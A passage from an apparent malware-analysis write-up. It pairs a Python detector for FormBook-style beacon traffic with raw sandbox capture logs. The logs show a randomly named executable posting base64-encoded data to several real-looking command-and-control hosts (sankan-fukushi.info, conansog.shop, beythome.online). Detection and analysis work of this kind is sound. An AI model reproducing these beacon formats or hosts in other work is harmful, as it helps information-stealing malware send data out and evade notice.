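6192.168.2.649991163.44.185.183803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
TimestampBytes transferredDirectionData
Nov 20, 2024 08:32:21.122011900 CET855OUTPOST /21k5/ HTTP/1.1
Host: www.sankan-fukushi.info
Connection: close
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Origin: http://www.sankan-fukushi.info
Referer: http://www.sankan-fukushi.info/21k5/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Data Ascii: GR54yHZ8=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRItmo5cLCL7Ed/gNoag7srZ6QLxJpC6RcF6LGA3Q7hhU/Xev4Ag4lqRuFpRtdjuKKWuqRSyco61eRcqFvP3jYcl2ceojHwMU9V2DPNObc8a4e9YjgZ9L15wIywO5WDLPfn2zU/vEzb/PYZ18HK7U7ehemmlFyqq4hIUrn4eI7pZrS3hpzvdeKyTMsKg==
Nov 20, 2024 08:32:21.919670105 CET1236INHTTP/1.1 404 Not Found
8192.168.2.649993203.0.113.10804112C:\Program Files\Google\Chrome\Application\chrome.exe
Nov 20, 2024 08:33:00.000000000 CET412OUTGET /index.html HTTP/1.1
Host: www.example.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36
Nov 20, 2024 08:33:00.100000000 CET1236INHTTP/1.1 200 OK
"""

# The report fuses timestamp, byte count, direction and request into one
# line ("CET855OUTPOST ..."); \W* also accepts a "CET | 855 | OUT |" layout.
REQ = re.compile(r"^(?:.*?CET\W*\d+\W*OUT\W*)?(POST|GET) (\S+) HTTP/1\.[01]$")
RESP = re.compile(r"^(?:.*?CET\W*\d+\W*IN\W*)?HTTP/1\.[01] (\d{3})")
PROC = re.compile(r"(C:\\.*?\.exe)$")          # process path at the end of a session row
B64 = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")  # base64 alphabet only, long enough to matter


@dataclass
class Session:
    process: str = ""
    method: str = ""
    path: str = ""
    headers: dict = field(default_factory=dict)
    body: str = ""
    status: str = ""


def parse_sessions(text):
    """Return one Session per outbound request found in the report text."""
    sessions, cur, process, in_request = [], None, "", False
    for raw in text.splitlines():
        line = raw.strip()
        if m := PROC.search(line):            # session row: remember the process
            process = m.group(1)
        elif m := REQ.match(line):            # outbound request opens a session
            cur = Session(process=process, method=m.group(1), path=m.group(2))
            sessions.append(cur)
            in_request = True
        elif cur is None or not line:
            continue
        elif m := RESP.match(line):           # server reply closes the request part
            cur.status = m.group(1)
            in_request = False
        elif in_request and line.startswith("Data Ascii: "):
            cur.body = line[len("Data Ascii: "):]   # the POST body
        elif in_request and ": " in line and not line.startswith("Data Raw:"):
            name, _, value = line.partition(": ")
            cur.headers[name.lower()] = value
    return sessions


def formbook_indicators(s):
    """Names of the beacon traits a session shows (rules are this example's)."""
    h, hits = s.headers, []
    if s.method == "POST" and re.fullmatch(r"/[A-Za-z0-9]{2,8}/", s.path):
        hits.append("post_to_short_path")
    if "MSIE 7.0" in h.get("user-agent", ""):
        hits.append("legacy_msie_user_agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if h.get("origin") and h.get("referer") == h["origin"] + s.path:
        hits.append("referer_is_origin_plus_path")   # no page was ever loaded
    _, sep, value = s.body.partition("=")
    if sep and h.get("content-type") == "application/x-www-form-urlencoded" and B64.fullmatch(value):
        hits.append("single_base64_form_field")
    if re.search(r"\\Program Files( \(x86\))?\\[A-Za-z]{24,}\\[A-Za-z]+\.exe$", s.process):
        hits.append("random_named_process_in_program_files")
    return hits


def is_formbook_beacon(s, threshold=4):
    """Assumed threshold: four of the six traits; tune it against your own baseline."""
    return len(formbook_indicators(s)) >= threshold


if __name__ == "__main__":
    for s in parse_sessions(SAMPLE):
        print(s.method, s.path, s.status, is_formbook_beacon(s), formbook_indicators(s))
```

Run as a script it prints one line per session; the beacon session hits all six traits and the Chrome control hits none. The threshold exists because a legacy User-Agent or Connection: close on its own is common in benign traffic; the combination with a base64 body posted to a short path from an oddly named binary is what separates this traffic from noise.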


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.6 | 49992 | 163.44.185.183 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:32:23.665066004 CET | 1868 | OUT | POST /21k5/ HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/21k5/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 2b 6f 34 75 44 43 4a 59 73 64 77 41 4e 6f 5a 67 37 74 72 5a 37 56 4c 77 68 6c 43 36 63 2b 46 2b 37 47 41 56 49 37 70 77 55 2f 64 65 76 34 43 67 34 34 6b 78 75 55 70 53 56 5a 6a 75 61 4b 57 75 71 52 53 77 45 6f 34 6b 65 52 61 71 46 73 66 48 6a 4d 59 6c 32 34 65 6f 4c 58 77 4d 51 44 56 46 4c 50 4e 71 2f 63 77 4a 41 65 30 59 6a 69 59 39 4b 6d 35 77 56 69 77 4f 6c 73 44 4b 4c 31 6e 30 76 55 2f 72 56 4e 42 2b 58 48 47 57 6f 39 4c 36 6f 69 56 55 43 75 6d 55 77 4d 72 6f 73 71 46 46 58 56 77 76 6f 2f 6e 59 53 76 68 7a 52 46 73 61 48 46 34 43 56 48 53 6c 74 43 4d 78 30 55 54 64 61 4a 47 67 56 46 75 35 46 54 6c 77 55 66 76 4b 4b 42 4a 33 64 35 66 4b 46 78 37 4e 6e 32 34 74 74 4d 55 45 58 39 70 47 33 38 79 78 43 37 76 50 68 59 66 50 57 6f 48 4a 6c 78 30 46 32 79 48 49 5a 4f 46 36 64 57 4b 4b 54 6c 59 75 66 68 42 5a 59 6d 4e 47 47 34 6f 42 76 44 48 2b 6d 79 76 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8= [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:24.442312956 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:24 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:24.442328930 CET | 231 | IN | Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                                                  Nov 20, 2024 08:32:24.442339897 CET | 1236 | IN | Data Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                                                  Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                                                  Nov 20, 2024 08:32:24.442435026 CET | 1236 | IN | Data Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                                                  Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                  Nov 20, 2024 08:32:24.442446947 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78
                                                                                  Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
                                                                                  Nov 20, 2024 08:32:24.442456961 CET | 1236 | IN | Data Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66
                                                                                  Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
                                                                                  Nov 20, 2024 08:32:24.442467928 CET848INData Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31
                                                                                  Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
                                                                                  Nov 20, 2024 08:32:24.442667961 CET1236INData Raw: 30 34 2d 2e 30 30 31 20 32 2e 36 35 38 2e 35 38 31 20 35 2e 32 38 33 20 31 2e 37 30 36 20 37 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d
                                                                                  Data Ascii: 04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201
                                                                                  Nov 20, 2024 08:32:24.442677975 CET224INData Raw: 39 63 31 2e 34 37 34 2d 2e 31 32 36 20 32 2e 38 35 36 2e 37 33 31 20 33 2e 34 20 32 2e 31 30 37 2e 35 37 20 32 2e 30 32 35 2e 37 32 32 20 34 2e 31 34 35 2e 34 34 36 20 36 2e 32 33 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22
                                                                                  Data Ascii: 9c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.231z"/><path fill="#fff" d="M39.765 24.186c-7.462 5.259-11.816 13.887-11.613 23.014 0 16.42 10.954 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387
                                                                                  Nov 20, 2024 08:32:24.442694902 CET1236INData Raw: 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64
                                                                                  Data Ascii: -.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0
                                                                                  Nov 20, 2024 08:32:24.447444916 CET1236INData Raw: 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37
                                                                                  Data Ascii: 4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49994 | 163.44.185.183 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:26.207138062 CET | 561 | OUT | GET /21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E= HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:32:26.991022110 CET | 192 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49995 | 172.67.162.12 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:32.227000952 CET | 813 | OUT | POST /m7wz/ HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.conansog.shop
                                                                                  Referer: http://www.conansog.shop/m7wz/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=p1DRQC/le5qi9393HISnjWArnatrkjAxtSum9hyV9AyS66w+Fp7xOhCBF6v7Su/S433pt5k3xHOzTNInYC+48rRNbwBzCB9fhmIrmT748B9Ztyd7LoHykrteuIy13Xuce4hgJEZeas0dXlebhEjqy+bYdcpfzley/uHGuKjvD2G5YZB9XAFeAZPZUEbyfK/6Ws2FZbzyIAXt
Nov 20, 2024 08:32:32.755002022 CET | 736 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:32 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8qsgZKpL5%2BIEMLkgPctW4ezvVIezvcx1vZFZN5KOK27eIP2yS09Rl6Pbie6JGA1GpFKwM9tjbc1NzZpgqLkaQxEiVkoxRXzYGLUqnHuSL4LBq2jQKSVVrXEpu5c%2F7U1lymrzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf27d96618b4-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49996 | 172.67.162.12 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:34.779586077 CET | 837 | OUT | POST /m7wz/ HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.conansog.shop
                                                                                  Referer: http://www.conansog.shop/m7wz/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79ymS6Y4+Eo7xCBCBRquzP+/F43yWt7A3xHazTPAnY1C7+7RPXQBxfR9fhmIrmXbS8AZZtCt7LN7967tfpIy1gHuYe4hWJFF0apwdXkubiVjt8ObSAMozyWnIw/+hgdb2YkbcdvcnLzF9SJvbUGDAfq/QUsOFLM/VH0yO82l5yWv8489Halkuk88+nw==
Nov 20, 2024 08:32:35.293843031 CET | 736 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:35 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2QjhaMdPZUpTPf9YQKgxyrpiCFTXdfj4i51kY9YJ94UdBGPC5e1MWP1souS5GFU9ZsrGVQ2tl7qCWEAXH6TsBpu1FspQnqLQc9qgt6%2FUoL5e3Ix1tKHD3tP2g%2Bn2zjEpy1NWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf37bc16c40c-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=837&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49997 | 172.67.162.12 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:37.335365057 CET | 1850 | OUT | POST /m7wz/ HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.conansog.shop
                                                                                  Referer: http://www.conansog.shop/m7wz/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:32:37.887171984 CET | 737 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:37 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fsOM0cobQUnoO9b4LskZpsWXiuu4iqNSuQgzfS9oIkeaXTh6881BbxO0BILvhBxIMpn36iJPjDWnrJEVzi5ZEhOAxdXH1oCuvyIJS13FxVD43xxum9oZbcSe%2FUJEI%2B0MZNeojw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf47eef07c81-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1850&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49998 | 172.67.162.12 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:39.880542994 CET | 555 | OUT | GET /m7wz/?GR54yHZ8=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhLYFcCcGdRxpuCJbxh795ns7rh5kB8bzkZsIh+aAnGmWaZAVFBY=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.conansog.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:32:40.445230007 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:40 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtY4I4%2FPOl8mcAanVs610Df1xiU8L%2BOlIimEsI4ATtgSjSLCA5oEhz0l2Ia1b%2BKjrqq18l0uW7jVxxsam1eT0eEZY2RP2wbrewnLX9qrwjncEctnzKAgJOTSNwNfh0JGu1XNng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56bf57ec2f42b0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49999 | 85.159.66.93 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:45.587671041 CET | 819 | OUT | POST /80gy/ HTTP/1.1
                                                                                  Host: www.beythome.online
